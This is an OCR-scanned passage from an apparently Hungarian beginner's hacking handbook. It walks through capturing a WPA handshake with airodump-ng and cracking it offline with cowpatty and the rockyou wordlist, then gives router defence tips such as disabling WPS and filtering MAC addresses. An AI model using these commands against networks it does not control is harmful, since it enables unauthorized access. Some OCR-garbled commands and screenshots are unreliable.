Néhány jótanács a támadás kivitelezésével kapcsolatban: • Egyes WIFI routerek esetében előfordulhat, hogy a bemuta­ tott módszerek nem működnek. Ez tulajdonképpen jó hír, mert azt mutatja, hogy a hálózat meglehetősen jól védett. • Igyekezzünk minél közelebb lenni a routerhez! Fontos a minél nagyobb jelerősség. • A program futása közben olykor hibát jelezhet. Ez teljesen normális. Egyszerűen hagyjuk tovább futni.

8.3.

Offline WIFI jelszótörés - Cowpatty

Bármilyen izgalmasnak is tűnik a "helyszíni" jelszótörés, a valóságban gyakran bele lehet futni olyan routerekbe, melyek­ nél az eddig tárgyalt módszerek rendre csődöt mondanak. De nem ez az egyetlen lehetséges módszer. WIFI jelszavakat lehetséges offline módban is visszafejteni. Ehhez a Káli Linux másik segédprogramját, a cowpatty-t fog­ juk használni.

cowpatty A jelszó feltörésének folyamata itt is a WIFI adapter monito­ rozó módba állításával történik. A továbbiakban azonban nem a PIN kitalálgatása a taktika, hanem az ún. "WPA handshake" üzenet megvárása. Mielőtt elkezdenénk, adjuk ki ismét a következő parancsot: airodump-ng wlanOmon

írjuk fel a megjelenő lista ’CH' oszlopában szereplő számot. Ez a WIFI router által használt csatorna száma. A MAC címre itt is szükségünk lesz.

116

Kezdő hackerek kézikönyve

Adjuk ki a következő parancsot: airodump-ng —bssid XX:XX:XX:XX:XX:XX -c channelnum -w filenam e netadaptername

A -w kapcsolóval az airodump adatcsomagokat kezd el rög­ zíteni a megadott fájlba. A hálózat adapter neve esetünkben ’wlanOmon' lesz. A folyamatot egészen addig hagynunk kell futni, amíg a jobb felső sarokban meg nem jelenik a ’WPA handshake:' felirat. root@ kalí: ~ Fiié

CH

Edit V íe w

O © O

Search Term inál H elp

1 ] [ Elapsed: 2 mins ] [ 2616-08-08 08:52 ] [ WPA handshake: ■ ■ ■ ■ ■ :

BSSID

PWR RXQ Beaccns

#Data. #/s

CH MB

ENC

CIPHER AUTH E

Ekkor a CTR+C billentyűkombinációval leállíthatjuk a fo­ lyamatot. Valahányszor kiadjuk a fenti parancsot, a -w kapcso­ lónál megadott fájlnévhez egy sorszám is rendelődik, sőt, több fájl is létrejön. A ’haloadat' fájlnév megadásakor például az alábbi fájlok jönnek létre két egymás utáni futtatáskor: haloadat-Ol.cap haloadat-Ol.csv haloadat-01.kismet.csv haloadat-01 .kismet.netxml haloadat-02.cap haloadat-02.csv haloadat-02.kismet.csv haloadat-02.kismet.netxml

Hálózati hozzáférések elleni támadások

117

Számunkra most a CAP kiterjesztésű fájl az érdekes. Ez tar­ talmazza a rögzített hálózati adatot, ami alapján a jelszót is fel tudjuk törni. Szükségünk lesz egy jelszólistára is. Ilyet magunk is összeál­ líthatunk, de szerencsére a Káli Linux gyakorlásra tartalmaz egy saját jelszólista fájlt is. Ez alapesetben a /usr/share/wordlists/rockyou.txt.gz

tömörített fájlban található, amit a gunzip /usr/share/wordlists/rockyou.txt.gz

paranccsal tudunk kicsomagolni. Egyetlen szövegfájlt kapunk, ez a rockyou.txt lesz, ami a könyvünk megírásához használt Káli Linux verzióban több mint 14 millió jelszót tartalmaz. Most már tényleg mindenünk megvan. Adjuk ki a következő parancsot: cow patty -f /usr/share/w ordlists/rockyou.txt -r haloadat-Ol.cap -s networkname

Amennyiben a WIFI jelszó szerepel a jelszólistában, a folya­ mat végén kiíródik a képernyőre: T h e P S K is "JELSZÓ". root@kali:~ Fiié Edit View

0 © ©

Search Terminál Help

cowpatty - f w o r d lis t 2 .t x t - r h a lo a d a t-O l.ca p -s 806e50 cowpatty 4 .6 - WPA-PSK d ic tio n a ry a tta c k . C o lle cte d a l l necessary data to mount crack against WPA2/PSK passphrase. S ta r tin g d ic tio n a ry a tta c k . Please be p a tie n t. The

PSK

is

1 passphrases te sted in 0.G1 seconds:

:őöt§kalí:~#

70.85 passphrases/second

j| i

A Káli Linux említett jelszólistája elég jól használható, mind­ azonáltal csak az esetek bizonyos százalékában használható

118

Kezdő hackerek kézikönyve

eredményesen. Mint korábban már említettük, egy jó jelszólista nagyon fontos az ilyen típusú jelszótöréseknél. A wordlist.txt-hez hasonló jelszófájlokat gyorsan átfésülhet­ jük, amennyiben gyakorlásra használjuk őket. Az alábbi paranccsal például Linux alatt megszámlálhatjuk a jelszavak számát a fájlban: wc -w filenam e

Ha ellenőrizni akarjuk, hogy például a WIFI hálózatunk jel­ szava benne van-e a listában, ezt a parancsot adjuk ki: grep "JELSZÓ" filenam e

8.4.

Androidos hotspot feltörése

Felmerülhet a kérdés: Androidos WIFI hotspotokat fel lehete törni a fentebb ismertetett módszerekkel? Nos, kipróbáltuk egy teszt telefonon. Technikailag elindítha­ tó volt a folyamat, a gyakorlatban azonban a WIFI hotspot az Androidos eszközön inaktívvá vált, illetve nem sikerült adato­ kat összegyűjteni a jelszó feltöréséhez.

8.5.

Védekezési javaslatok routerekhez

Ha új routert veszünk, első dolgunk legyen, hogy deaktivál­ juk a WPS szolgáltatást. Megjegyezzük, hogy a Reaver sok eset­ ben ekkor is képes lehet a jelszó kitalálására, ugyanis a WPS szolgáltatás a látszat ellenére valójában ilyenkor is bekapcsolva maradhat. / Érdemes lehet szűrni a hálózatunkra csatlakozó MAC címe­ ket. Sajnos ez azonban nem véd meg minket attól, hogy hamisí­ tott MAC címmel kapcsolódjon valaki a hálózatra. Ezt nemileg ellensúlyozni lehet azzal, ha folyamatosan figyelve van a háló­ zat és ha gyanús kapcsolódás látható (például két ugyanolyan MAC című eszköz is csatlakozva van), akkor behatolóval van dolgunk.

Hálózati hozzáférések elleni támadások

119

Egyes vélemények szerint a DD-WRT nevű, nyílt forráskódú router firmware telepítése a routerre védelmet jelent. Legalább­ is a Reaver ellen... A routerek különböző biztonsági beállításaira is érdemes egy fél órát szánnunk, amikor beüzemeljük azt. Az alábbiakban né­ hány beállítást mutatunk be Cisco routeren, a fejezetben bemu­ tatott támadási módok tükrében. Jó ötlet lehet az SSID/BSSID közlésének letiltása. Ezzel, mint láthattuk, a hálózati hozzáférés megszerzésének bizonyos lépé­ sei legalábbis megnehezíthetőek. Példánkban a vonatkozó beál­ lítás a router 'Rádió settings' füle alatt találhatóak.

A MAC címek hamisítása miatt a hálózatunkhoz csatlakozta­ tott eszközök MAC címeinek a szűrése csak korlátozott védel­ met nyújt, de valamivel ez is több a semminél. Több MAC címet felvehetünk, melyeket vagy blokkolni, vagy kizárólagosan en­ gedélyezni lehet a MAC Address Filtering' beállításaival.

120

Kezdő hackerek kézikönyve

M AC FBtering

: Access Restriction

0

®

Enable

Disable

Blc-ck dsvicfes list&d fc-elcw firow scce ssin a intern s í P e rm it d e v ic e s listed balos* to se cess letefn e t

MAC Acfdress Filter List ;

O

o

1

M A C 01: 0 0 : : 0 0 : : 0 0 : 0 0 ::0 Q ::0 D Í

M A C 11:

I

:

M A C 02: :0 0 : : 0 0 : :0 Q : 0 0 :: 0 0 : :öol

M A C 12: 0 0 : : 0 0 : : 0 0 : ;Ö 0:: 0 0 : : 0 ö

j |

M A C 03: '0 0 : : 0 0 : r 0 0 d 0 0 :rOO:: 0 0 j

M A C 13: ;0 0 :: 0 0 : : 0 0 ; ;0Q ;: 0 0 ; : 0 0

J

M A C 04: ^00:: 0 0 : : 0 0 s 0 0 ::Q 0 ::Q 0 !

M A C 14: iQO:: 0 0 :: 0 0 : lOQ:: 0 0 : :0 0 :

j

M A C 05: [0 0 : ; 0 0 : : 0 0 : 0 0 :: 0 0 : :Q 0 |

< M A C 15: í Q Q j: 0 0 : : 0 0 ; i0 0 i: 0 0 : :0 0

M A C 06: j 0 0 : : 0 C ::Q 0 : :00::Q 0 : :001

M A C 16:

'i

:0 0 : :0 0 : : 0 0 :: 0 0 : :0 C

|00::Q 0 : :00::00:iO Q : :00:

J

M A C 07:

|00;;00:;00500::00::00

M A C 17: I q O::00::00::00:: 0 0 : :00

I

M A C 08:

|

|00::00::00íi00::G 0 ::Q0